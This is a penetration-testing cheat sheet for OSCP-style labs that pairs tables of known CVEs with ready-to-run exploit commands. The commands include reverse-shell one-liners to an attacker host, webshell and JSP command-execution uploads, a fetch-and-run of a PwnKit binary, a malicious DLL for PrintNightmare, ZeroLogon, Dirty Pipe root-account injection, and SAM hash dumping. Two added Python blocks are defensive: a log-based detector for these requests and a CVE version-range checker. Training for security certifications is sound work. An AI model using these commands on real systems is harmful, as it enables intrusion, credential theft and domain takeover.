Known vulnerabilities commonly encountered on OSCP-style boxes, Proving Grounds, and HackTheBox. Organized by category with version ranges, PoC links, and quick usage examples.
How to use this page:

1. Identify the service and version on your target
2. Find it in the tables below
3. Follow the PoC link or use the command provided

Always check SearchSploit first:

```bash
searchsploit <service> <version>
searchsploit -m <exploit_id>   # Mirror exploit to current directory
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2020-25213 | WP File Manager < 6.9 | Unauthenticated file upload RCE | GitHub |
| CVE-2021-24145 | Modern Events Calendar < 5.16.5 | Authenticated file upload RCE | ExploitDB |
| CVE-2022-0739 | BookingPress < 1.0.11 | Unauthenticated SQLi | GitHub |
| CVE-2023-2732 | MStore API < 3.9.3 | Authentication bypass | WPScan |

```bash
# CVE-2020-25213 — WP File Manager unauthenticated upload
curl -F 'cmd=upload' -F 'target=l1_Lw' \
     -F 'upload[]=@shell.php' \
     http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
# Shell at: http://$IP/wp-content/plugins/wp-file-manager/lib/files/shell.php
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 | Drupalgeddon2 — Unauthenticated RCE | GitHub |
| CVE-2018-7602 | Drupal < 7.59 / < 8.5.3 | Drupalgeddon3 — Authenticated RCE | GitHub |
| CVE-2019-6340 | Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10 | REST module deserialization RCE | GitHub |

```bash
# CVE-2018-7600 — Drupalgeddon2 (most common)
python3 drupalgeddon2.py http://$IP/

# Metasploit:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS $IP
run
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2015-8562 | Joomla 1.5 - 3.4.5 | Object injection RCE via HTTP headers | GitHub |
| CVE-2017-8917 | Joomla 3.7.0 | SQLi in com_fields | GitHub |
| CVE-2023-23752 | Joomla 4.0.0 - 4.2.7 | Unauthenticated information disclosure | GitHub |

```bash
# CVE-2023-23752 — Information disclosure (leaks DB creds)
curl -s "http://$IP/api/index.php/v1/config/application?public=true" | python3 -m json.tool

# CVE-2017-8917 — SQLi
sqlmap -u "http://$IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
       --risk=3 --level=5 -p 'list[fullordering]' --dbs
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2017-12617 | Tomcat 7.0.0-7.0.81 / 8.5.0-8.5.22 | PUT method RCE via JSP upload | GitHub |
| CVE-2020-1938 | Tomcat < 9.0.31 / < 8.5.51 / < 7.0.100 | Ghostcat — AJP file read/RCE | GitHub |
| CVE-2019-0232 | Tomcat 7/8/9 on Windows with CGI | CGI servlet command injection | ExploitDB |

```bash
# CVE-2020-1938 — Ghostcat (AJP port 8009)
python3 ajpShooter.py http://$IP:8009 /WEB-INF/web.xml read

# CVE-2017-12617 — PUT method JSP upload
curl -X PUT "http://$IP:8080/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2019-9053 | CMSMS < 2.2.10 | Blind SQLi — Dumps admin credentials | GitHub |

```bash
# CVE-2019-9053 — CMS Made Simple blind SQLi
python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2021-22205 | GitLab 11.9 - 13.10.2 | Unauthenticated RCE via image upload | GitHub |
| CVE-2023-7028 | GitLab 16.1 - 16.7.1 | Account takeover via password reset | GitHub |

```bash
# CVE-2021-22205 — Unauthenticated RCE
python3 CVE-2021-22205.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2021-43798 | Grafana 8.0.0 - 8.3.0 | Unauthenticated arbitrary file read | GitHub |

```bash
# CVE-2021-43798 — Arbitrary file read via plugin path traversal
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

# Grab the database:
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2024-23897 | Jenkins < 2.442 / LTS < 2.426.3 | Arbitrary file read via CLI | GitHub |
| CVE-2019-1003000 | Script Security Plugin < 1.49 | Sandbox bypass RCE | ExploitDB |
| CVE-2018-1000861 | Jenkins < 2.154 / LTS < 2.138.4 | Unauthenticated RCE | GitHub |

```bash
# CVE-2024-23897 — File read via CLI
java -jar jenkins-cli.jar -s http://$IP:8080/ help "@/etc/passwd"
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2019-15107 | Webmin 1.890 - 1.920 | Unauthenticated RCE via password_change.cgi | GitHub |
| CVE-2012-2982 | Webmin < 1.590 | Authenticated RCE via file manager | ExploitDB |

```bash
# CVE-2019-15107 — Unauthenticated RCE
curl -sk "https://$IP:10000/password_change.cgi" \
     -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2020-14882 | WebLogic 10.3.6 / 12.x / 14.x | Unauthenticated RCE | GitHub |
| CVE-2019-2725 | WebLogic 10.3.6 / 12.1.3 | Deserialization RCE | GitHub |

```bash
# CVE-2020-14882 — WebLogic unauthenticated RCE
curl "http://$IP:7001/console/css/%252e%252e%252fconsole.portal" \
     -H "cmd: id"
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2015-1397 | Magento < 1.9.2.0 | Shoplift SQLi — Create admin account | ExploitDB |
| CVE-2022-24086 | Magento 2.3.x / 2.4.x | Template injection RCE | GitHub |

```bash
# CVE-2015-1397 — Shoplift (creates admin: forme/forme)
python2 shoplift.py http://$IP/
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2011-2523 | vsftpd 2.3.4 | Backdoor — Shell on port 6200 | Metasploit |
| CVE-2015-3306 | ProFTPD 1.3.5 | mod_copy — Unauthenticated file copy | ExploitDB |
| CVE-2019-12815 | ProFTPD < 1.3.5b / 1.3.6 | mod_copy arbitrary file copy | ExploitDB |

```bash
# vsftpd 2.3.4 backdoor (the ":)" in the username triggers it)
nc $IP 21
USER test:)
PASS test
# Then: nc $IP 6200

# ProFTPD mod_copy (commands typed into the FTP control session)
nc $IP 21
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/passwd.txt
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| MS17-010 | Windows XP - Server 2016 | EternalBlue — Unauthenticated RCE | GitHub |
| CVE-2017-7494 | Samba 3.5.0 - 4.6.4 | SambaCry — RCE via writable share | Metasploit |
| MS08-067 | Windows XP / Server 2003 / Vista / 2008 | NetAPI RCE — Classic exploit | GitHub |

```bash
# MS17-010 — EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 $IP

# Metasploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run

# CVE-2017-7494 — SambaCry
use exploit/linux/samba/is_known_pipename
set RHOSTS $IP
run
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2018-15473 | OpenSSH < 7.7 | Username enumeration | GitHub |
| CVE-2016-20012 | OpenSSH < 8.2 | Banner-based user enumeration | ExploitDB |

```bash
# CVE-2018-15473 — Username enumeration
python3 ssh_enum.py $IP -U users.txt

# Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2019-10149 | Exim 4.87 - 4.91 | "Return of the WIZard" — Unauthenticated RCE | GitHub |
| CVE-2017-7692 | SquirrelMail < 1.4.22 | Authenticated RCE | ExploitDB |

```bash
# CVE-2019-10149 — Exim RCE
python3 raptor_exim_wiz.py -t $IP -p 25 -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2014-6271 | Bash (via Apache CGI) | Shellshock — RCE via HTTP headers | ExploitDB |
| CVE-2021-41773 | Apache 2.4.49 | Path traversal + RCE | GitHub |
| CVE-2021-42013 | Apache 2.4.50 | Path traversal + RCE (bypass of 41773 fix) | GitHub |

```bash
# Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh

# CVE-2021-41773 — Apache path traversal + RCE
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/bash" -d 'echo; id'
```
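The web-facing entries on this page (Shellshock and the Apache traversal above, plus the Grafana, Tomcat, WebLogic, Joomla and WP File Manager commands earlier) each leave a distinctive request shape in the web server's access log. The following is an added defensive example, not part of the original page: it parses combined-format access log lines and flags those request shapes; the log lines and rule labels are constructed for the example.

```python
import re
# Apache/nginx combined log format; the quoted request is split into method and raw path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# (label, predicate on method, raw path, user-agent). Matching is done on the raw, still-encoded
# path, so the encoded traversal sequences used by the commands above are caught as sent.
RULES = [
    ("CVE-2014-6271 Shellshock", lambda m, p, ua: "() {" in ua),
    ("CVE-2021-41773/42013 Apache cgi-bin traversal",
     lambda m, p, ua: p.lower().startswith("/cgi-bin/") and bool(re.search(r"\.%2e/|%2e%2e/", p, re.I))),
    ("CVE-2021-43798 Grafana plugin traversal",
     lambda m, p, ua: p.startswith("/public/plugins/") and "/../" in p),
    ("CVE-2017-12617 Tomcat PUT .jsp",
     lambda m, p, ua: m == "PUT" and bool(re.search(r"\.jsp/?$", p, re.I))),
    ("CVE-2020-14882 WebLogic console traversal",
     lambda m, p, ua: "/console/" in p and "%252e%252e%252f" in p.lower()),
    ("CVE-2023-23752 Joomla config disclosure",
     lambda m, p, ua: p.startswith("/api/index.php/v1/config/application") and "public=true" in p),
    ("CVE-2020-25213 WP File Manager connector POST",
     lambda m, p, ua: m == "POST" and p.endswith("wp-file-manager/lib/php/connector.minimal.php")),
]

# Constructed sample log lines (RFC 5737 test addresses); the last one is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /cgi-bin/script.sh HTTP/1.1" 200 512 "-" "() { :; }; id"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1423 "-" "curl/7.88.1"
198.51.100.9 - - [10/Mar/2024:12:00:03 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1423 "-" "curl/7.88.1"
198.51.100.9 - - [10/Mar/2024:12:00:04 +0000] "PUT /shell.jsp/ HTTP/1.1" 201 0 "-" "curl/7.88.1"
192.0.2.5 - - [10/Mar/2024:12:00:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 3201 "-" "curl/7.88.1"
192.0.2.5 - - [10/Mar/2024:12:00:06 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 880 "-" "curl/7.88.1"
192.0.2.5 - - [10/Mar/2024:12:00:07 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 210 "-" "curl/7.88.1"
10.0.0.4 - - [10/Mar/2024:12:00:08 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def scan(lines):
    """Return (client_ip, rule_label, raw_path) for every log line that matches a rule."""
    hits = []
    for line in lines:
        mo = LOG_RE.match(line)
        if not mo:
            continue  # not combined format; a real pipeline would count these
        for label, pred in RULES:
            if pred(mo["method"], mo["path"], mo["ua"]):
                hits.append((mo["ip"], label, mo["path"]))
    return hits

if __name__ == "__main__":
    for ip, label, path in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip:14} {label:48} {path}")
```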
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2017-7269 | IIS 6.0 (Windows Server 2003) | WebDAV buffer overflow RCE | GitHub |
| MS15-034 | IIS (HTTP.sys) | Integer overflow — DoS / info disclosure | ExploitDB |

```bash
# CVE-2017-7269 — IIS 6.0 WebDAV
python2 iis6_exploit.py $IP 80 $LHOST 4444

# Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2016-5195 | Linux Kernel < 4.8.3 | Dirty COW — Write to read-only files | GitHub |
| CVE-2021-4034 | Polkit (all major distros) | PwnKit — pkexec local root | GitHub |
| CVE-2021-3156 | Sudo 1.8.2 - 1.9.5p1 | Baron Samedit — Heap overflow root | GitHub |
| CVE-2022-0847 | Linux Kernel 5.8 - 5.16.11 | Dirty Pipe — Overwrite read-only files | GitHub |
| CVE-2022-2588 | Linux Kernel < 5.19 | Route4 use-after-free local root | GitHub |
| CVE-2023-0386 | Linux Kernel < 6.2 | OverlayFS privilege escalation | GitHub |
| CVE-2023-32233 | Linux Kernel < 6.4 | Netfilter nf_tables local root | GitHub |

```bash
# PwnKit (CVE-2021-4034) — Works on almost every unpatched Linux
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

# Dirty COW (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword

# Baron Samedit (CVE-2021-3156)
# Check if vulnerable:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# Exploit:
python3 CVE-2021-3156.py

# Dirty Pipe (CVE-2022-0847)
gcc exploit.c -o exploit
./exploit /etc/passwd 1 $'\npiped:$1$piped$password:0:0::/root:/bin/bash\n'
su piped   # password: password
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2020-0787 | Windows 10 / Server 2016-2019 | BITS arbitrary file write → SYSTEM | GitHub |
| CVE-2020-1472 | Windows Server (Netlogon) | ZeroLogon — Domain admin in seconds | GitHub |
| CVE-2021-1675 | Windows (Print Spooler) | PrintNightmare — LPE / RCE to SYSTEM | GitHub |
| CVE-2021-36934 | Windows 10 (1809+) | HiveNightmare — Read SAM as user | GitHub |
| CVE-2022-26923 | AD Certificate Services | Certifried — Domain user to DA | GitHub |
| MS16-032 | Windows 7/8/10 / Server 2008-2012 | Secondary Logon handle privesc | ExploitDB |
| MS16-098 | Windows 8.1 / Server 2012 | Kernel exploit via RGNOBJ | ExploitDB |

```bash
# PrintNightmare (CVE-2021-1675)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
# Double quotes so $LHOST expands; each backslash is doubled for the shell
python3 CVE-2021-1675.py domain.local/user:'password'@$IP "\\\\$LHOST\\share\\evil.dll"

# ZeroLogon (CVE-2020-1472) — Resets DC machine password
python3 zerologon_tester.py DC_NAME $DC_IP
python3 cve-2020-1472-exploit.py DC_NAME $DC_IP
impacket-secretsdump -no-pass -just-dc domain.local/DC_NAME\$@$DC_IP
```

```
# HiveNightmare (CVE-2021-36934) — Copy SAM as regular user (run on the target)
icacls C:\Windows\System32\config\SAM
# If readable:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
```

```bash
# Then extract the hashes offline from the copied hives
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
```

```powershell
# MS16-032
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
```
| CVE | Affected Version | Description | PoC |
|---|---|---|---|
| CVE-2020-1472 | Windows Server (Netlogon) | ZeroLogon — Reset DC machine account | GitHub |
| CVE-2021-1675 | Windows (Print Spooler) | PrintNightmare — RCE as SYSTEM | GitHub |
| CVE-2021-42278 + CVE-2021-42287 | AD (all versions) | noPac — Domain user to DA | GitHub |
| CVE-2022-26923 | AD Certificate Services | Certifried — Machine account to DA | GitHub |

```bash
# noPac (CVE-2021-42278 + CVE-2021-42287) — User to DA
python3 noPac.py domain.local/user:'password' -dc-ip $DC_IP -dc-host DC01 --impersonate administrator -dump

# Certifried (CVE-2022-26923) — Via AD CS
certipy account create -u user@domain.local -p 'password' -dc-ip $DC_IP -user 'machine$' -dns dc.domain.local
# Single quotes: unquoted, the shell would expand "$@" and mangle the account name
certipy req -u 'machine$@domain.local' -p 'password' -dc-ip $DC_IP -ca CORP-CA -template Machine
certipy auth -pfx dc.pfx -dc-ip $DC_IP
```
When you find a service version, follow this process:

1. `searchsploit <service> <version>` → Local exploit database
2. Google: `"<service> <version> exploit"` → Recent PoCs
3. Check this page → Curated OSCP-relevant CVEs
4. GitHub search: `"CVE-YYYY-XXXXX"` → Find PoC repos
5. HackTricks: book.hacktricks.wiki → Methodology + exploits
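Matching a discovered version against the ranges in the tables above is the same check an asset inventory or patch-compliance script performs, and the ranges are written in three different styles: branch-scoped fixes ("< 9.0.31 / < 8.5.51 / < 7.0.100"), inclusive spans ("8.0.0 - 8.3.0") and suffixed releases ("1.9.5p1"). The following is an added example, not part of the original page: it encodes a handful of rows from the tables (the product keys and the selection are this example's own) and checks a version string against them, handling all three styles.

```python
import re

# Subset of this page's tables, encoded as (CVE, [(lower_inclusive, upper, upper_inclusive), ...]).
# A lower bound scopes a "< x" fix to its release branch, so that e.g. Tomcat 8.5.60 is not
# flagged merely because 8.5.60 sorts below 9.0.31. Product keys and the selection of rows are
# this example's own; this is not a complete database.
KNOWN = {
    "tomcat": [
        ("CVE-2017-12617", [("7.0.0", "7.0.81", True), ("8.5.0", "8.5.22", True)]),
        ("CVE-2020-1938", [("7.0", "7.0.100", False), ("8.5", "8.5.51", False), ("9.0", "9.0.31", False)]),
    ],
    "grafana": [("CVE-2021-43798", [("8.0.0", "8.3.0", True)])],
    "gitlab": [("CVE-2021-22205", [("11.9", "13.10.2", True)]), ("CVE-2023-7028", [("16.1", "16.7.1", True)])],
    "sudo": [("CVE-2021-3156", [("1.8.2", "1.9.5p1", True)])],
    "apache": [("CVE-2021-41773", [("2.4.49", "2.4.49", True)]), ("CVE-2021-42013", [("2.4.50", "2.4.50", True)])],
    "openssh": [("CVE-2018-15473", [(None, "7.7", False)])],
}

def vtuple(v):
    """Numeric components only: '1.9.5p1' -> (1, 9, 5, 1), so 'p1' sorts after the base release."""
    return tuple(int(x) for x in re.findall(r"\d+", v))

def vcmp(a, b):
    """Three-way compare of two version strings, right-padding the shorter tuple with zeros."""
    ta, tb = vtuple(a), vtuple(b)
    n = max(len(ta), len(tb))
    ta, tb = ta + (0,) * (n - len(ta)), tb + (0,) * (n - len(tb))
    return (ta > tb) - (ta < tb)

def in_range(version, lo, hi, hi_inclusive):
    if lo is not None and vcmp(version, lo) < 0:
        return False
    c = vcmp(version, hi)
    return c <= 0 if hi_inclusive else c < 0

def lookup(product, version):
    """Return the sorted CVE ids from KNOWN whose affected range contains `version`."""
    return sorted(cve for cve, ranges in KNOWN.get(product.lower(), [])
                  if any(in_range(version, *r) for r in ranges))

if __name__ == "__main__":
    for prod, ver in [("tomcat", "8.5.20"), ("tomcat", "8.5.60"), ("sudo", "1.9.5p1"), ("openssh", "7.7p1")]:
        print(f"{prod} {ver}: {lookup(prod, ver) or 'no entry on this page'}")
```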